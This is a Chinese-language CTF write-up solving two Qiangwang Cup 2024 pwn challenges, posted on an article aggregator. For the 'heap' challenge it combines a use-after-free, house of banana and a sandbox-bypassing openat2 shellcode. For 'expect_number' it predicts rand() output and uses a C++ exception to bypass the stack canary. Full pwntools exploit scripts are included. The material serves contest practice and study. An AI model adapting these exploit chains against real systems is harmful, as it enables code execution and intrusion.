强网杯 2024 pwn false AK

强网杯 2024 pwn

  • 🏄🏽‍♀️前言
  • 🏄🏽‍♂️heap(UAF + house of banana + orw)
    • 🏄🏽分析
    • 🏄🏽解题
    • 🏄🏽exp
  • 🏄🏽‍♂️expect_number(random + 栈溢出 + try/catch抛出异常canary绕过)
    • 🏄🏽分析
    • 🏄🏽解题
    • 🏄🏽exp

🏄🏽‍♀️前言

只做了两题,有些遗憾没能把chat_with_me也做出来。heap的爆破耽误了好多时间,第一次爆破2.35不太熟练

🏄🏽‍♂️heap(UAF + house of banana + orw)

🏄🏽分析

在这里插入图片描述
checksec查看。保护全开
在这里插入图片描述
IDA查看。这里我已经改好名了
在这里插入图片描述
开始这里设置了一下libc这个段,将一些IO的地址改为0了,不知道有什么用,好像是禁IO,apple可能用不了,所以我没往这方面考虑
在这里插入图片描述
沙箱查看。禁open,execve,openat。禁了和没禁一样,原意可能是用ptrace绕过,有可能出题人不知道openat2。所以直接正常orw就行了
在这里插入图片描述
add函数中只能add大块chunk,明显largebin attack,考虑house of banana,house of banana原理不讲,主要是改_rtld_global为可控堆地址
在这里插入图片描述
delete函数存在UAF漏洞
在这里插入图片描述
edit函数只能edit一次,要想成功house of banana要两次
在这里插入图片描述
show函数直接show一个大块,只能泄露一次,可能有漏洞能利用,这里不管
在这里插入图片描述
env函数感觉没啥用,不管。后来看是可以打印环境变量里的flag,后来又听出题人说失误没清环境变量里的flag
在这里插入图片描述
secret函数有一次任意地址改的机会,house of banana可以执行了,利用这个机会改_rtld_global
在这里插入图片描述
有个更改地址的检查,在某个范围内不能改,我没仔细看,对house of banana无关

🏄🏽解题

在这里插入图片描述
在这里插入图片描述
照house of banana的操作来,先申请较大块,申请最大块,申请较小块,删除较大块,申请最大块,较大块就能进largebin

进去之后连接到了heap的地址和libc的地址,都能泄露出来,以及附带的一些gadget

泄露出来后,计算_rtld_global的地址,由于高版本环境libcbase的末5为固定为0,所以比较好爆破,需要1/512的概率。首先是 + 0x21c000,随后 + (0x1000~0x200000)的数(这里末3位不随机,1/512的概率),再 + 0x6b040的固定偏移(环境不同会变化)
在这里插入图片描述
在这里插入图片描述
随后利用secret修改_rtld_global,sleep是为了等本地进程结束,再在delete中输入就会直接异常结束进程,方便爆破。远程也同理,delete的主要作用是爆破,可以不用
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
之后把link_map结构体写进可控堆,需要注意的是上面给的结构体图是2.31的,2.35需要将*l_next字段改为_rtld_global + 0x1850而不是0x16e0,house of banana基本完成
在这里插入图片描述
输入6来触发exit函数走_dl_fini执行流,mprotect一段地址,再写shellcode上去,调用openat2,read,write完成orw
在这里插入图片描述
写一个爆破的函数,概率比较小可以多开几个终端一起爆

🏄🏽exp

from pwn import *filename = './pwn'elf = ELF(filename)context(arch = elf.arch, log_level = 'debug', os = 'linux')def dbg():gdb.attach(io)libc = ELF('./libc-2.35.so')def add(size):io.sendlineafter('choice: \n', '1')io.sendlineafter('size \n', str(size))def delete(index):io.sendlineafter('choice: \n', '2')io.sendlineafter('delete: \n', str(index))def edit(index, content):io.sendlineafter('choice: \n', '3')io.sendlineafter('edit: \n', str(index))io.sendlineafter('content \n', content)def show(index):io.sendlineafter('choice: \n', '4')io.sendlineafter('show: \n', str(index))def pwn():add(0x510)add(0x600)add(0x500)delete(1)add(0x600)show(1)io.recvuntil('here \n')large_430 = u64(io.recv(8))io.recv(8)heapbase = u64(io.recv(8)) - 0x1950libcbase = large_430 - 0x21b110libc.address = libcbasesetcontext = libc.sym['setcontext'] + 0x3dsyscall = libc.sym['read'] + 16ret = libcbase + 0x29139rdi = libcbase + 0x2a3e5rsi = libcbase + 0x2be51rdx_rbx = libcbase + 0x904a9rcx = libcbase + 0x3d1eerax = libcbase + 0x45eb0success('libcbase =>> ' + hex(libcbase))success('heapbase =>> ' + hex(heapbase))success('setcontext =>> ' + hex(setcontext))_rtld_global = libcbase + 0x21c000 + 0x1f5000 + 0x6b040success('_rtld_global =>> ' + hex(_rtld_global))heap = heapbase + 0x2480io.sendlineafter('choice: \n', '6')io.sendafter('addr \n', p64(_rtld_global))io.send(p64(heap))sleep(0.1)delete(3)link_map = p64(0)link_map += p64(_rtld_global + 0x1850) #2.35link_map += p64(0)link_map += p64(heap)link_map += p64(0) * 28 link_map += p64(heap + 0x110)link_map += p64(heap + 0x110)link_map += p64(heap + 0x120)link_map += p64(0x40)link_map += b'/bin/sh\x00'link_map += p64(heap + 0x110)link_map += p64(setcontext)link_map += p64(ret)link_map += p64(0) * 12link_map += p64(0)link_map += p64(heap + 0x110)link_map += p64(0) * 2link_map += p64(0x200)link_map += p64(0) * 2link_map += p64(heap + 0x110)link_map += p64(libc.sym['read'])link_map += p64(0) * 36link_map += p64(0xb00000000)io.sendline('3')io.sendlineafter('edit: \n', str(3))io.sendafter('content \n', link_map)io.recv()io.sendline('6')io.send(p64(rdi) + p64(heap - (heap & 0xfff)) + p64(rsi) + p64(0x1000) + p64(rdx_rbx) + p64(7) + p64(0) + p64(rax) + p64(10) + p64(syscall) + p64(rdi) + p64(0) + p64(rsi) + p64(heap - (heap & 0xfff)) + p64(rdx_rbx) + p64(0x500) + p64(0) + p64(rax) + p64(0) + p64(syscall) + p64(heap - (heap & 0xfff)))shellcode = f'''mov rax, 0x67616c66 /*  /flag   */push raxxor rdi, rdisub rdi, 100mov rsi, rsppush 0push 0push 0mov rdx, rspmov r10, 0x18push 437pop raxsyscall'''io.send(asm(shellcode + shellcraft.read(3, heap, 0x100) + shellcraft.write(1, heap, 0x100)))io.interactive()for i in range(1000):io = process(filename)try:pwn()except:continuefinally:io.close()

🏄🏽‍♂️expect_number(random + 栈溢出 + try/catch抛出异常canary绕过)

🏄🏽分析

在这里插入图片描述
checksec查看。保护全开
在这里插入图片描述
IDA查看。这里我已经改好名了
在这里插入图片描述
intt函数中,初始化了一下,设置了srand为1,后面有用到rand,关于随机数可以看我的这篇文章学习
https://blog.csdn.net/j284886202/article/details/134676894

告诉说要闯288关,只能用0, 1, 2三个数,我还以为是shellcode,说如果能让数等于0x4F5DA2就能给个gift,实际是等于0xA2,也没给gift

在这里插入图片描述
vuln函数中,利用index函数输入想要的index,如果是4的话会执行那样一个东西,是1则是进行运算,2是show一下之前所有运算中用到了什么数,3是给gift
在这里插入图片描述
count函数,上来检测一下如果超过了288次运算则退出,最多只能运算288次,随后rand了一下,1-4这四个值作为要执行的加减乘除操作,如果是4,先判断被除数不能为0,再判断要能整除,随后再进行除法。

加减乘的话没有太多要求,直接赋值就好
在这里插入图片描述
随后执行这一段,检查了一下结果数字的大小,不能超过0x101。需要注意的是该函数在拿v11的时候有一个操作是movsx eax, al,这个操作使得原数字的大小不能超过128,否则会被扩展成32位负数,最后在检查结果数字大小的时候必定超过0x101。

检查完后将本次的操作数放到那个内存地址里,再将本次结果数字放到本次的操作数的地址后面

在这里插入图片描述
show的话没什么好说的。gift函数就是检测结果数字是不是0xA2,如果是就执行system(“cat gift”),但远程并没有gift,这个只能用来说是熟悉一下题目操作

IDA先分析到这,剩下的必须结合解题来分析了

🏄🏽解题

在这里插入图片描述
随便进行一些操作,data数据如图,末尾0x60是结果数字,前面的303132这些是操作数,加了0x30。下面0x5c3df880c520处有个地址,是在menu执行‘4’,exit的时候用的
在这里插入图片描述
观察‘4’的调用流程,可以知道,先从0x5e3c930ca520拿了一个地址,再从这个地址里拿一个地址,作为call rdx执行,rdi参数不重要
在这里插入图片描述
进入IDA,发现拿的第一个地址在这里,这里是一个偏移表,有很多偏移

随后第二个地址会拿到exitt
在这里插入图片描述
之后执行了这里的内容

如果能更改从0x5e3c930ca520拿的地址,例如拿到off_4C60,就可以去执行rread函数

在这里插入图片描述
这里有个栈溢出,刚好覆盖ret,随后是try/catch抛出异常绕过canary(原理不讲)
在这里插入图片描述
找了一下’/bin/sh’字符串,发现这里有个try/catch,后面接了个system,等会就ret到这里就可以获取shell了
在这里插入图片描述
经过288次操作后,操作数刚好写满了,但是结果数字会写在操作数的后一位,导致了溢出,将原本的exit跳板修改为了rread的跳板

这里还需要控制结果数字为0x60
在这里插入图片描述
调用C库模拟rand,我这里是奔着srand的种子是time去写的,他这里降低了难度,固定种子为1,但是用time做种子也可以做

skip函数用来跳过无关数字,count完成需要的操作,期望:2 3 6 12 24 48 96

0 + 2 = 2, 2 + 1 = 3,后面一直 * 2就好
在这里插入图片描述
用skip填充后面的字符,直到288次,溢出一字节
在这里插入图片描述
由于0x5e3c930ca520存了一个程序段的地址,所以还能获取程序基地址,计算出bss地址以及刚刚的system的try的地址 + 1
在这里插入图片描述
随后触发‘4’,exit已经被替换为rread函数了,rbp填bss,ret填system的try的地址 + 1,就可以绕过canary并获取shell

🏄🏽exp

from pwn import *
from ctypes import *filename = './expect_number'debug = 0
if debug:io = remote('47.94.237.181', 32818)
else:io = process(filename)elf = ELF(filename)context(arch = elf.arch, log_level = 'debug', os = 'linux')def dbg():gdb.attach(io)libc = cdll.LoadLibrary('libc.so.6')libc.srand(1)def add(num):io.sendlineafter('choice ', '1')io.sendlineafter('choose? 2 or 1 or 0', str(num))def show():io.sendlineafter('choice ', '2')def submit():io.sendlineafter('choice ', '3')def exit():io.sendlineafter('choice ', '4')def skip(how, b = ''):for i in range(how):if b == '':b = libc.random() % 4 + 1if b == 1:add(0)elif b == 2:add(0)elif b == 3:add(1)elif b == 4:add(1)b = ''i = 0def count(how, value):global iwhile 1:a = libc.random() % 4 + 1i += 1if a == how:add(value)break;else:skip(1, a)continue# 2 3 6 12 24 48 96count(1, 2)
count(1, 1)
count(3, 2)
count(3, 2)
count(3, 2)
count(3, 2)
count(3, 2)skip(0x114 - i)show()
io.recvuntil('History')
io.recv(0x11a)
base = u64(io.recv(6).ljust(8, b'\0')) - 0x4c60
success('base =>> ' + hex(base))
bss = base + 0x5500
sys = base + 0x2515 + 1exit()
io.send(b'A' * 0x20 + p64(bss) + p64(sys))io.interactive()

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/884585.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

w016基于Springboot的房产销售系统

🙊作者简介:拥有多年开发工作经验,分享技术代码帮助学生学习,独立完成自己的项目或者毕业设计。 代码可以私聊博主获取。🌹赠送计算机毕业设计600个选题excel文件,帮助大学选题。赠送开题报告模板&#xff…

Python毕业设计选题:基于大数据的旅游景区推荐系统_django

开发语言:Python框架:djangoPython版本:python3.7.7数据库:mysql 5.7数据库工具:Navicat11开发软件:PyCharm 系统展示 系统首页界面 用户注册界面 用户登录界面 景点信息界面 景点资讯界面 个人中心界面 …

【c++篇】:掌握vector基础知识--基本操作与使用全知道

✨感谢您阅读本篇文章,文章内容是个人学习笔记的整理,如果哪里有误的话还请您指正噢✨ ✨个人主页:余辉zmh–CSDN博客 ✨文章所属专栏:c篇–CSDN博客 文章目录 前言一.vector的基本概念1.定义2.主要特性和优点 二.vector的基本操作…

基于SSM+微信小程序的订餐管理系统(点餐2)

👉文末查看项目功能视频演示获取源码sql脚本视频导入教程视频 1、项目介绍 基于SSM微信小程序的订餐管理系统实现了管理员和用户。管理端实现了 首页、个人中心、用户管理、菜品分类管理、菜品信息管理、订单信息管理、配送信息管理、菜品评价管理、订单投诉管理、…

机器学习周报(RNN的梯度消失和LSTM缓解梯度消失公式推导)

文章目录 摘要Abstract 1 RNN的梯度消失问题2 LSTM缓解梯度消失总结 摘要 在深度学习领域,循环神经网络(Recurrent Neural Network, RNN)被广泛应用于处理序列数据,特别是在自然语言处理、时间序列预测等任务中。然而&#xff0c…

Mastercam2025软件安装教程+MC2025中文安装包下载

一、软件下载 【软件名称】:MasterCAM 2025 【支持系统】:win10/win11 【百度网盘】:https://pan.baidu.com/s/12fY66cwRLGcKdeVoJ40ZRw?pwd70zi 二、Mastercam软件 Mastercam是美国 CNC Software 公司开发的一款 CAD/CAM 软件。它集二维…

[vulnhub] DC: 8

https://www.vulnhub.com/entry/dc-8,367/ 描述:在 Linux 上安装和配置双因素身份验证是否可以防止 Linux 服务器被利用 端口扫描主机发现 探测存活主机,179是靶机 nmap -sP 192.168.75.0/24 Starting Nmap 7.94SVN ( https://nmap.or…

自扶正救生艇,保障水上救援的安全卫士_鼎跃安全

在应急事件中,自扶正救生艇能够发挥关键的救援和保障作用,确保救援人员和被困人员的生命安全,尤其在极端天气或突发水上事故中展现出明显优势。 在救援过程中如果遭遇翻船,救生艇能够迅速恢复正常姿态,确保救援人员不会…

提升网站安全性 HTTPS的重要性与应用指南

内容概要 在如今数字化快速发展的时代,网站安全显得尤为重要。许多用户在访问网站时,尤其是涉及个人信息或金融交易时,对数据传输的安全性有着高度的关注。HTTPS(超文本传输安全协议)正是为了满足这种需求而诞生的。通…

QT——自定义控件绘图

一.QPaintEvent绘图事件 QPaintEvent是QT中一个重要的类,专门用于绘图事件。当QT视图组件需要重绘制自己的一部分时,就会产生该事件,通常发生在以下几种情况。 窗口第一次显示时:当窗口或控件第一次出现在屏幕中,系统…

【Python · Pytorch】人工神经网络 ANN(上)

【Python Pytorch】人工神经网络 ANN(上) 0. 生物神经网络1. 人工神经网络定义2. 人工神经网络结构2.1 感知机2.2 多层感知机2.3 全连接神经网络2.4 深度神经网络 2. 训练流程※ 数据预处理 (Data Preprocessing) 3. 常见激活函数3.1 Sigmoid / Logisti…

【Redis_Day2】在Linux中安装Redis5

本篇涉及Linux中的三条指令:su;apt;vim,可以了解后再来浏览本篇。或在评论留言。 【Redis_Day2】在Linux中安装Redis5 安装修改配置文件使用redis-cli连接服务器 安装 Linux版本选择Ubuntu22.04 Redis版本选择Redis5 登录Ubunt…

第1篇 引言

一、AIGC概念 1、AIGC定义 AIGC,即生成式人工智能(Artificial Intelligence Generated Content),是指利用人工智能技术自动生成或辅助创作内容的过程和结果。 简单来说:过去,写文章、画张图、唱首歌、弄个…

深度学习---------------------------------Transformer

目录 Transformer架构多头注意力有掩码的多头注意力基于位置的前馈网络层归一化信息传递预测总结代码多头注意力使用多个头并行计算选择缩放点积注意力作为每一个注意力头测试该部分总代码Transformer基于位置的前馈网络改变张量的最里层维度的尺寸对比不同维度的层归一化和批量…

世界时区划分

1. AoE (Anywhere on Earth)代表地球上最后一个时区的时间,是全球范围内最晚的时间,通常用于截止日期。 2. UTC/GMT (协调世界时/格林威治时间)是全球的标准时间,所有时区都是基于UTC计算的。…

qt QImage详解

1、概述 QImage是Qt框架中用于处理图像数据的一个核心类。与QPixmap不同,QImage是在内存中直接存储图像像素数据的,这使得它适用于需要直接访问和修改像素的应用场景,比如图像处理算法、图像绘制以及图像分析等。QImage支持多种图像格式&…

DAY75WEB 攻防-验证码安全篇接口滥用识别插件复用绕过宏命令填入滑块类

知识点: 1、验证码简单机制-验证码过于简单可爆破 2、验证码重复使用-验证码验证机制可绕过 3、验证码智能识别-验证码图形码被可识别 4、验证码接口调用-验证码触发接口可枚举 图片验证码-识别插件-登录爆破&接口枚举 验证码识别绕过等技术适用于&#x…

字符串左旋 (干货无废话)

题目内容:实现一个函数,可以左旋字符串中的k个字符 例如:ABCD左旋一个字符得到BCDA ABCD左旋两个字符得到CDAB 画图解释: 上图分别是向左挪1次,2次,3次,4次,5次后的结果…

QML基础语法2

函数 函数格式: function关键字 函数名(参数名1:参数类型,参数名2:参数类型,...):返回值类型{} 其中: 函数名必须以小写字符开头,后面驼峰可以有多个参数或者没有参数参数类型可以不写返回值类型也可以不写 如何调用:通过id点…

Mac 配置SourceTree集成云效

1、背景 工作使用的是自己的笔记本,一个是比较卡,在一个是敏感信息比较多还是使用公司的电脑,但是系统是Mac就很麻烦,在网上找了帖子记录一下 2、配置 打开终端 ssh-keygen -t rsa #一直回车就行 cd .ssh cat id_rsa.pub #查…